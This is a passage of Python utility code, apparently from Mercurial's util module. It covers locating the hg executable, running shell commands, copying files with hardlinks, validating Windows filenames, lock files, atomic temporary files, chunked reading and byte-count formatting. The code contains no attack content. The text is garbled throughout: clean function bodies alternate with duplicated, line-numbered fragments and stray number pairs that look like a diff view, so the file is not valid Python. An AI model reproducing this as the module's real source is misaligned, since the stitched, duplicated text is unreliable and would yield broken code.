def hgexecutable():
    """Return the location of the 'hg' executable.

    Defaults to $HG or 'hg' in the search path; the answer is cached
    in the module-level _hgexecutable.
    """
    if _hgexecutable is not None:
        return _hgexecutable
    envhg = encoding.environ.get('HG')
    main = sys.modules[pycompat.sysstr('__main__')]
    if envhg:
        _sethgexecutable(envhg)
    elif mainfrozen():
        if getattr(sys, 'frozen', None) == 'macosx_app':
            # Env variable set by py2app
            _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
        else:
            _sethgexecutable(pycompat.sysexecutable)
    elif (os.path.basename(
            pycompat.fsencode(getattr(main, '__file__', ''))) == 'hg'):
        # running directly from an 'hg' script
        _sethgexecutable(pycompat.fsencode(main.__file__))
    else:
        _sethgexecutable(findexe('hg') or os.path.basename(sys.argv[0]))
    return _hgexecutable
1440
1440
1441 def _sethgexecutable(path):
1441 def _sethgexecutable(path):
1442 """set location of the 'hg' executable"""
1442 """set location of the 'hg' executable"""
1443 global _hgexecutable
1443 global _hgexecutable
1444 _hgexecutable = path
1444 _hgexecutable = path
1445
1445
1446 def _isstdout(f):
1446 def _isstdout(f):
1447 fileno = getattr(f, 'fileno', None)
1447 fileno = getattr(f, 'fileno', None)
1448 try:
1448 try:
1449 return fileno and fileno() == sys.__stdout__.fileno()
1449 return fileno and fileno() == sys.__stdout__.fileno()
1450 except io.UnsupportedOperation:
1450 except io.UnsupportedOperation:
1451 return False # fileno() raised UnsupportedOperation
1451 return False # fileno() raised UnsupportedOperation
1452
1452
def shellenviron(environ=None):
    """Return the environment with optional overrides, for shelling out."""
    def tostr(val):
        # render python values in a shell-friendly way
        if val is None or val is False:
            return '0'
        if val is True:
            return '1'
        return pycompat.bytestr(val)
    env = dict(encoding.environ)
    if environ:
        env.update((k, tostr(v)) for k, v in environ.iteritems())
    # always tell children where hg itself lives
    env['HG'] = hgexecutable()
    return env
1467
1467
def system(cmd, environ=None, cwd=None, out=None):
    """Enhanced shell command execution; return the exit code.

    Runs with a possibly-modified environment (*environ*) and working
    directory (*cwd*).  When *out* is given (a file-like object with a
    write() method) both stdout and stderr of the command are streamed
    into it instead of inheriting our stdout.
    """
    try:
        # avoid interleaving with whatever we buffered ourselves
        stdout.flush()
    except Exception:
        pass
    cmd = quotecommand(cmd)
    env = shellenviron(environ)
    if out is None or _isstdout(out):
        rc = subprocess.call(cmd, shell=True, close_fds=closefds,
                             env=env, cwd=cwd)
    else:
        proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                                env=env, cwd=cwd, stdout=subprocess.PIPE,
                                stderr=subprocess.STDOUT)
        for line in iter(proc.stdout.readline, ''):
            out.write(line)
        proc.wait()
        rc = proc.returncode
    if pycompat.sysplatform == 'OpenVMS' and rc & 1:
        # OpenVMS encodes success in the low bit
        rc = 0
    return rc
1494
1494
def checksignature(func):
    """Wrap *func* so calling it with a bad signature raises
    error.SignatureError instead of a bare TypeError.

    A TypeError raised deeper inside the call (traceback longer than
    one frame) is re-raised unchanged.
    """
    def checked(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            frames = traceback.extract_tb(sys.exc_info()[2])
            if len(frames) == 1:
                # the call itself failed, not the function body
                raise error.SignatureError
            raise

    return checked
1506
1506
1507 # a whilelist of known filesystems where hardlink works reliably
1507 # a whilelist of known filesystems where hardlink works reliably
1508 _hardlinkfswhitelist = {
1508 _hardlinkfswhitelist = {
1509 'btrfs',
1509 'btrfs',
1510 'ext2',
1510 'ext2',
1511 'ext3',
1511 'ext3',
1512 'ext4',
1512 'ext4',
1513 'hfs',
1513 'hfs',
1514 'jfs',
1514 'jfs',
1515 'NTFS',
1515 'NTFS',
1516 'reiserfs',
1516 'reiserfs',
1517 'tmpfs',
1517 'tmpfs',
1518 'ufs',
1518 'ufs',
1519 'xfs',
1519 'xfs',
1520 'zfs',
1520 'zfs',
1521 }
1521 }
1522
1522
def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    """Copy a file, preserving mode and optionally other stat info like
    atime/mtime.

    With hardlink=True a hardlink is attempted first, but only on
    filesystems known to support them reliably; otherwise a plain copy
    is made.  checkambig is used with filestat and is only useful when
    the destination is guarded by a lock (e.g. repo.lock or
    repo.wlock).  copystat and checkambig are mutually exclusive.
    """
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            # remember the stat so we can detect mtime ambiguity later
            oldstat = filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), so only allow
        # them when dest sits on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass # fall back to normal copy
    if os.path.islink(src):
        os.symlink(os.readlink(src), dest)
        # copytime is ignored for symlinks, but in general copytime
        # isn't needed for them anyway
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
            if oldstat and oldstat.stat:
                newstat = filestat.frompath(dest)
                if newstat.isambig(oldstat):
                    # stat of copied file is ambiguous to original one;
                    # nudge mtime forward to disambiguate
                    advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
                    os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise Abort(str(inst))
1574
1574
def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
    """Copy a directory tree, using hardlinks when possible.

    Returns a (hardlink, count) pair: whether hardlinking stayed
    viable throughout, and how many files were processed.
    """
    num = 0

    gettopic = lambda: hardlink and _('linking') or _('copying')

    if os.path.isdir(src):
        if hardlink is None:
            # hardlink only when source and destination share a device
            hardlink = (os.stat(src).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            def nprog(t, pos):
                # offset nested progress by files already processed
                if pos is not None:
                    return progress(t, pos + num)
            hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
            num += n
    else:
        if hardlink is None:
            hardlink = (os.stat(os.path.dirname(src)).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                # linking failed once: stop trying for the rest
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        progress(topic, num)
    progress(topic, None)

    return hardlink, num
1614
1614
1615 _winreservednames = {
1615 _winreservednames = {
1616 'con', 'prn', 'aux', 'nul',
1616 'con', 'prn', 'aux', 'nul',
1617 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1617 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1618 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1618 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1619 }
1619 }
1620 _winreservedchars = ':*?"<>|'
1620 _winreservedchars = ':*?"<>|'
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith('\\'):
        return _("filename ends with '\\', which is invalid on Windows")
    if '\\/' in path:
        return _("directory name ends with '\\', which is invalid on Windows")
    for part in path.replace('\\', '/').split('/'):
        if not part:
            continue
        for ch in _filenamebytestr(part):
            if ch in _winreservedchars:
                return _("filename contains '%s', which is reserved "
                         "on Windows") % ch
            if ord(ch) <= 31:
                # control characters are never valid in Windows names
                return _("filename contains '%s', which is invalid "
                         "on Windows") % escapestr(ch)
        stem = part.split('.')[0]
        if stem and stem.lower() in _winreservednames:
            return _("filename contains '%s', which is reserved "
                     "on Windows") % stem
        tail = part[-1:]
        if tail in '. ' and part not in '..':
            # trailing dot/space; '.' and '..' themselves stay allowed
            return _("filename ends with '%s', which is not allowed "
                     "on Windows") % tail
1667
1667
if pycompat.iswindows:
    checkosfilename = checkwinfilename
    timer = time.clock
else:
    checkosfilename = platform.checkosfilename
    timer = time.time

if safehasattr(time, "perf_counter"):
    # available from python 3.3 on; preferred over clock()/time()
    timer = time.perf_counter
1677
1677
def makelock(info, pathname):
    """Create a lock file atomically if possible

    This may leave a stale lock file if symlink isn't supported and signal
    interrupt is enabled.
    """
    try:
        # a symlink is atomic and stores info in its target
        return os.symlink(info, pathname)
    except OSError as err:
        # EEXIST means somebody else holds the lock; any other error
        # (e.g. filesystem without symlink support) falls through to
        # the plain-file scheme below
        if err.errno == errno.EEXIST:
            raise
    except AttributeError: # no symlink in os
        pass

    fd = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
    os.write(fd, info)
    os.close(fd)
1690
1695
def readlock(pathname):
    """Return the info string stored in the lock file *pathname*.

    Reads the symlink target when the lock is a symlink; otherwise
    falls back to reading the file contents (the plain-file scheme
    used by makelock when symlinks are unavailable).
    """
    try:
        return os.readlink(pathname)
    except OSError as err:
        # EINVAL: exists but is not a symlink; ENOSYS: no symlinks here
        if err.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    except AttributeError: # no symlink in os
        pass
    fp = posixfile(pathname)
    contents = fp.read()
    fp.close()
    return contents
1703
1708
def fstat(fp):
    """Stat a file object that may not have a fileno method, falling
    back to stat-ing it by name."""
    fileno = getattr(fp, 'fileno', None)
    if fileno is None:
        return os.stat(fp.name)
    return os.fstat(fileno())
1710
1715
1711 # File system features
1716 # File system features
1712
1717
def fscasesensitive(path):
    """Return true if the given path is on a case-sensitive filesystem.

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.
    """
    origstat = os.lstat(path)
    dirname, base = os.path.split(path)
    flipped = base.upper()
    if flipped == base:
        flipped = base.lower()
    if flipped == base:
        return True # no evidence against case sensitivity
    try:
        flippedstat = os.lstat(os.path.join(dirname, flipped))
    except OSError:
        # the case-flipped sibling doesn't resolve at all: sensitive
        return True
    # same inode under both spellings means case-insensitive
    return flippedstat != origstat
1735
1740
1736 try:
1741 try:
1737 import re2
1742 import re2
1738 _re2 = None
1743 _re2 = None
1739 except ImportError:
1744 except ImportError:
1740 _re2 = False
1745 _re2 = False
1741
1746
class _re(object):
    """Regex helpers that transparently prefer re2 over the stdlib re."""

    def _checkre2(self):
        # validate that the installed re2 binding really works
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
            # re2 takes inline flags rather than a flags argument
            if flags & remod.IGNORECASE:
                pat = '(?i)' + pat
            if flags & remod.MULTILINE:
                pat = '(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                # pattern uses features re2 doesn't support
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        return re2.escape if _re2 else remod.escape
1784
1789
# module-level singleton exposing compile()/escape with re2 acceleration
re = _re()
1786
1791
# per-directory cache of {normcased name: on-disk name} mappings
_fspathcache = {}
def fspath(name, root):
    """Get *name* in the case stored in the filesystem.

    The name should be relative to root, and be normcase-ed for
    efficiency.  The root should be normcase-ed, too.

    Note that this function is unnecessary, and should not be called,
    for case-sensitive filesystems (simply because it's expensive).
    """
    def _makefspathcacheentry(dir):
        return dict((normcase(n), n) for n in os.listdir(dir))

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly.
    # (historical no-op: str.replace returns a new string, discarded here)
    seps.replace('\\','\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    curdir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            result.append(sep)
            continue

        if curdir not in _fspathcache:
            _fspathcache[curdir] = _makefspathcacheentry(curdir)
        contents = _fspathcache[curdir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patches of "hg qpush", for example
            _fspathcache[curdir] = contents = _makefspathcacheentry(curdir)
            found = contents.get(part)

        result.append(found or part)
        curdir = os.path.join(curdir, part)

    return ''.join(result)
1829
1834
def checknlink(testfile):
    """Check whether hardlink count reporting works properly for the
    filesystem that holds *testfile*."""
    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    f1 = f2 = fp = None
    try:
        fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
                                  suffix='1~', dir=os.path.dirname(testfile))
        os.close(fd)
        f2 = '%s2~' % f1[:-2]

        oslink(f1, f2)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        fp = posixfile(f2)
        return nlinks(f2) > 1
    except OSError:
        return False
    finally:
        # best-effort cleanup of the probe files
        if fp is not None:
            fp.close()
        for probe in (f1, f2):
            try:
                if probe is not None:
                    os.unlink(probe)
            except OSError:
                pass
1858
1863
def endswithsep(path):
    """Check whether *path* ends with os.sep or os.altsep."""
    if path.endswith(pycompat.ossep):
        return True
    return pycompat.osaltsep and path.endswith(pycompat.osaltsep)
1863
1868
def splitpath(path):
    '''Split path on os.sep (deliberately ignoring os.altsep).

    This is a thin alternative to "path.split(os.sep)"; run
    os.path.normpath() on the path first if normalization is needed.'''
    sep = pycompat.ossep
    return path.split(sep)
1871
1876
def gui():
    '''Are we running in a GUI?'''
    if not pycompat.isdarwin:
        # elsewhere, Windows or a set DISPLAY implies a GUI
        return pycompat.iswindows or encoding.environ.get("DISPLAY")
    if 'SSH_CONNECTION' in encoding.environ:
        # handle SSH access to a box where the user is logged in
        return False
    isgui = getattr(osutil, 'isgui', None)
    if isgui:
        # check if a CoreGraphics session is available
        return isgui()
    # pure build; use a safe default
    return True
1886
1891
def mktempcopy(name, emptyok=False, createmode=None):
    """Create a temporary file with the same contents from name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    d, fn = os.path.split(name)
    fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, temp, createmode)
    if emptyok:
        # caller will truncate/overwrite anyway, so skip the content copy
        return temp
    try:
        try:
            ifp = posixfile(name, "rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                # source doesn't exist: the empty temp file is the copy
                return temp
            if not getattr(inst, 'filename', None):
                # annotate the error with the offending path for callers
                inst.filename = name
            raise
        ofp = posixfile(temp, "wb")
        for chunk in filechunkiter(ifp):
            ofp.write(chunk)
        ifp.close()
        ofp.close()
    except: # re-raises
        # the copy failed for any reason: don't leave the temp file behind
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp
1927
1932
class filestat(object):
    """help to exactly detect change of a file

    'stat' attribute is result of 'os.stat()' if specified 'path'
    exists. Otherwise, it is None. This can avoid preparative
    'exists()' examination on client side of this class.
    """
    def __init__(self, stat):
        self.stat = stat

    @classmethod
    def frompath(cls, path):
        """Stat 'path', mapping a missing file to a None stat."""
        try:
            st = os.stat(path)
        except OSError as err:
            if err.errno != errno.ENOENT:
                raise
            st = None
        return cls(st)

    @classmethod
    def fromfp(cls, fp):
        """Build a filestat from an already-open file object."""
        return cls(os.fstat(fp.fileno()))

    __hash__ = object.__hash__

    def __eq__(self, old):
        try:
            # once ambiguity between the stats of the new and old file
            # has been avoided, comparing size, ctime and mtime is
            # enough to exactly detect change of a file regardless of
            # platform
            return (self.stat.st_size == old.stat.st_size and
                    self.stat.st_ctime == old.stat.st_ctime and
                    self.stat.st_mtime == old.stat.st_mtime)
        except AttributeError:
            pass
        # at least one side lacks a usable stat: equal only when both
        # represent "file does not exist"
        try:
            return self.stat is None and old.stat is None
        except AttributeError:
            return False

    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        Two stats taken within the same second (equal st_ctime) cannot
        be distinguished by timestamp comparison, and naturally advanced
        mtimes can collide with manually advanced ones, so every
        "old.ctime == new.ctime" case is treated as ambiguous regardless
        of mtime. Callers advance mtime by one second ("if
        isambig(oldstat)") to guarantee distinct mtimes even when the
        file size is unchanged.
        """
        try:
            return self.stat.st_ctime == old.stat.st_ctime
        except AttributeError:
            return False

    def avoidambig(self, path, old):
        """Change file stat of specified path to avoid ambiguity

        'old' should be previous filestat of 'path'.

        Returns False, skipping the adjustment, when the process lacks
        appropriate privileges for 'path'; True otherwise, meaning
        "ambiguity is avoided".
        """
        advanced = (old.stat.st_mtime + 1) & 0x7fffffff
        try:
            os.utime(path, (advanced, advanced))
        except OSError as inst:
            if inst.errno != errno.EPERM:
                raise
            # utime() on a file created by another user causes EPERM
            # when this process lacks appropriate privileges
            return False
        return True

    def __ne__(self, other):
        return not self == other
2029
2034
class atomictempfile(object):
    '''writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    checkambig argument of constructor is used with filestat, and is
    useful only if target file is guarded by any lock (e.g. repo.lock
    or repo.wlock).
    '''
    def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
        self.__name = name # permanent name
        # all writes land in this temporary sibling of the target file
        self._tempname = mktempcopy(name, emptyok=('w' in mode),
                                    createmode=createmode)
        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        """Flush pending writes and atomically replace the target file."""
        if not self._fp.closed:
            self._fp.close()
            filename = localpath(self.__name)
            # oldstat is truthy only when checkambig was requested and
            # the target already exists
            oldstat = self._checkambig and filestat.frompath(filename)
            if oldstat and oldstat.stat:
                rename(self._tempname, filename)
                newstat = filestat.frompath(filename)
                if newstat.isambig(oldstat):
                    # stat of changed file is ambiguous to original one
                    advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
                    os.utime(filename, (advanced, advanced))
            else:
                rename(self._tempname, filename)

    def discard(self):
        """Throw away all writes: remove the temp file without renaming."""
        if not self._fp.closed:
            try:
                os.unlink(self._tempname)
            except OSError:
                pass
            self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'): # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        # commit on a clean exit; discard if the with-body raised
        if exctype is not None:
            self.discard()
        else:
            self.close()
2092
2097
def unlinkpath(f, ignoremissing=False):
    """unlink and remove the directory if it is empty"""
    remove = tryunlink if ignoremissing else unlink
    remove(f)
    # best-effort removal of parent directories that might now be empty
    try:
        removedirs(os.path.dirname(f))
    except OSError:
        pass
2104
2109
def tryunlink(f):
    """Attempt to remove a file, ignoring ENOENT errors."""
    try:
        unlink(f)
    except OSError as err:
        if err.errno == errno.ENOENT:
            return
        raise
2112
2117
def makedirs(name, mode=None, notindexed=False):
    """recursive directory creation with parent mode inheritance

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as err:
        if err.errno == errno.EEXIST:
            # already exists: nothing to create (mode left untouched)
            return
        if err.errno != errno.ENOENT or not name:
            raise
        # a parent is missing: create the ancestors first, then retry
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            # reached the filesystem root; cannot recurse further
            raise
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as err:
            # Catch EEXIST to handle races
            if err.errno == errno.EEXIST:
                return
            raise
    if mode is not None:
        os.chmod(name, mode)
2140
2145
def readfile(path):
    """Return the entire binary content of the file at path."""
    fp = open(path, 'rb')
    try:
        return fp.read()
    finally:
        fp.close()
2144
2149
def writefile(path, text):
    """Create or overwrite the file at path with the bytes in text."""
    fp = open(path, 'wb')
    try:
        fp.write(text)
    finally:
        fp.close()
2148
2153
def appendfile(path, text):
    """Append the bytes in text to the file at path, creating it if needed."""
    fp = open(path, 'ab')
    try:
        fp.write(text)
    finally:
        fp.close()
2152
2157
class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""
        def splitbig(chunks):
            # re-chunk anything over 1MB into 256KB pieces so a single
            # huge chunk can't dominate memory while buffered
            for chunk in chunks:
                if len(chunk) > 2**20:
                    pos = 0
                    while pos < len(chunk):
                        end = pos + 2 ** 18
                        yield chunk[pos:end]
                        pos = end
                else:
                    yield chunk
        self.iter = splitbig(in_iter)
        self._queue = collections.deque()
        # offset into the leftmost queued chunk of data already handed
        # out by read()
        self._chunkoffset = 0

    def read(self, l=None):
        """Read L bytes of data from the iterator of chunks of data.
        Returns less than L bytes if the iterator runs dry.

        If size parameter is omitted, read everything"""
        if l is None:
            return ''.join(self.iter)

        left = l
        buf = []
        queue = self._queue
        while left > 0:
            # refill the queue with roughly 256KB of buffered data
            if not queue:
                target = 2**18
                for chunk in self.iter:
                    queue.append(chunk)
                    target -= len(chunk)
                    if target <= 0:
                        break
                if not queue:
                    # source exhausted; return what we have (short read)
                    break

            # The easy way to do this would be to queue.popleft(), modify the
            # chunk (if necessary), then queue.appendleft(). However, for cases
            # where we read partial chunk content, this incurs 2 dequeue
            # mutations and creates a new str for the remaining chunk in the
            # queue. Our code below avoids this overhead.

            chunk = queue[0]
            chunkl = len(chunk)
            offset = self._chunkoffset

            # Use full chunk.
            if offset == 0 and left >= chunkl:
                left -= chunkl
                queue.popleft()
                buf.append(chunk)
                # self._chunkoffset remains at 0.
                continue

            chunkremaining = chunkl - offset

            # Use all of unconsumed part of chunk.
            if left >= chunkremaining:
                left -= chunkremaining
                queue.popleft()
                # offset == 0 is enabled by block above, so this won't merely
                # copy via ``chunk[0:]``.
                buf.append(chunk[offset:])
                self._chunkoffset = 0

            # Partial chunk needed.
            else:
                buf.append(chunk[offset:offset + left])
                self._chunkoffset += left
                # drives left negative, which terminates the loop
                left -= chunkremaining

        return ''.join(buf)
2232
2237
def filechunkiter(f, size=131072, limit=None):
    """Create a generator that produces the data in the file size
    (default 131072) bytes at a time, up to optional limit (default is
    to read all data). Chunks may be less than size bytes if the
    chunk is the last chunk in the file, or the file is a socket or
    some other type of file that sometimes reads less data than is
    requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        nbytes = size if limit is None else min(limit, size)
        # a zero-byte request short-circuits to a falsy value and ends
        # the iteration without touching the file
        data = nbytes and f.read(nbytes)
        if not data:
            break
        if limit:
            limit -= len(data)
        yield data
2253
2258
class cappedreader(object):
    """A file object proxy that allows reading up to N bytes.

    Given a source file object, instances of this type allow reading up
    to N bytes from it; attempts to read past that limit behave as EOF.

    The instance assumes it is the only reader of the underlying file
    object; any other I/O on it desynchronizes the internal accounting
    and produces unexpected results.
    """
    def __init__(self, fh, limit):
        """Allow reading up to <limit> bytes from <fh>."""
        self._fh = fh
        self._left = limit

    def read(self, n=-1):
        remaining = self._left
        if not remaining:
            return b''

        # negative n means "as much as the cap allows"
        if n < 0:
            n = remaining

        data = self._fh.read(min(n, remaining))
        self._left = remaining - len(data)
        assert self._left >= 0

        return data
2282
2287
def stringmatcher(pattern, casesensitive=True):
    """
    accepts a string, possibly starting with 're:' or 'literal:' prefix.
    returns the matcher name, pattern, and matcher function.
    missing or unknown prefixes are treated as literal matches.

    helper for tests:
    >>> def test(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])
    >>> def itest(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])

    exact matching (no prefix):
    >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
    ('literal', 'abcdefg', [False, False, True])

    regex matching ('re:' prefix)
    >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
    ('re', 'a.+b', [False, False, True])

    force exact matches ('literal:' prefix)
    >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
    ('literal', 're:foobar', [False, True])

    unknown prefixes are ignored and treated as literals
    >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
    ('literal', 'foo:bar', [False, False, True])

    case insensitive regex matches
    >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
    ('re', 'A.+b', [False, False, True])

    case insensitive literal matches
    >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
    ('literal', 'ABCDEFG', [False, False, True])
    """
    if pattern.startswith('re:'):
        pattern = pattern[3:]
        flags = remod.I if not casesensitive else 0
        try:
            regex = remod.compile(pattern, flags)
        except remod.error as e:
            raise error.ParseError(_('invalid regular expression: %s')
                                   % e)
        return 're', pattern, regex.search
    if pattern.startswith('literal:'):
        pattern = pattern[8:]

    if casesensitive:
        match = pattern.__eq__
    else:
        ipat = encoding.lower(pattern)
        match = lambda s: ipat == encoding.lower(s)
    return 'literal', pattern, match
2341
2346
def shortuser(user):
    """Return a short representation of a user name or email address."""
    # strip the domain, unwrap "Name <addr>" brackets, then cut at the
    # first space or dot, in that order
    idx = user.find('@')
    if idx >= 0:
        user = user[:idx]
    idx = user.find('<')
    if idx >= 0:
        user = user[idx + 1:]
    for cutchar in (' ', '.'):
        idx = user.find(cutchar)
        if idx >= 0:
            user = user[:idx]
    return user
2357
2362
def emailuser(user):
    """Return the user portion of an email address."""
    user = user.split('@', 1)[0]
    # drop everything up to and including a '<'; when absent, find()
    # returns -1 and the slice below is a no-op
    return user[user.find('<') + 1:]
2367
2372
def email(author):
    '''get email of author.'''
    # slice between '<' and '>'; either bracket may be missing, in
    # which case the slice extends to the corresponding string edge
    close = author.find('>')
    stop = None if close == -1 else close
    return author[author.find('<') + 1:stop]
2374
2379
def ellipsis(text, maxlength=400):
    """Trim text to at most maxlength (default: 400) display columns,
    appending '...' when truncated."""
    return encoding.trim(text, maxlength, ellipsis='...')
2378
2383
def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity'''

    def render(count):
        # Scan from the coarsest unit down; the first entry whose
        # threshold (divisor * multiplier) the value reaches wins.
        for multiplier, divisor, fmt in unittable:
            if abs(count) >= divisor * multiplier:
                return fmt % (count / float(divisor))
        # Nothing matched: fall back to the finest unit's format.
        return unittable[-1][2] % count

    return render
2389
2394
def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
        ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
        ...
    ParseError: fromline must be strictly positive
    """
    # Reject an empty/negative span before checking the lower bound.
    if fromline > toline:
        raise error.ParseError(_("line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_("fromline must be strictly positive"))
    return fromline - 1, toline
2410
2415
# Render a byte count using the largest fitting unit; the table runs from
# coarse to fine so the first matching threshold wins, and the number of
# decimals shrinks as the magnitude grows (e.g. '1.23 GB', '12.3 GB',
# '123 GB').
bytecount = unitcountfn(
    (100, 1 << 30, _('%.0f GB')),
    (10, 1 << 30, _('%.1f GB')),
    (1, 1 << 30, _('%.2f GB')),
    (100, 1 << 20, _('%.0f MB')),
    (10, 1 << 20, _('%.1f MB')),
    (1, 1 << 20, _('%.2f MB')),
    (100, 1 << 10, _('%.0f KB')),
    (10, 1 << 10, _('%.1f KB')),
    (1, 1 << 10, _('%.2f KB')),
    (1, 1, _('%.0f bytes')),
)
2423
2428
# Matches a single EOL which can either be a CRLF where repeated CR
# are removed or a LF. We do not care about old Macintosh files, so a
# stray CR is an error. (Bytes pattern: applied to raw file data.)
_eolre = remod.compile(br'\r*\n')
2428
2433
def tolf(s):
    """Normalize every line ending in byte string s to a single LF."""
    return _eolre.sub('\n', s)
2431
2436
def tocrlf(s):
    """Normalize every line ending in byte string s to CRLF."""
    return _eolre.sub('\r\n', s)
2434
2439
if pycompat.oslinesep == '\r\n':
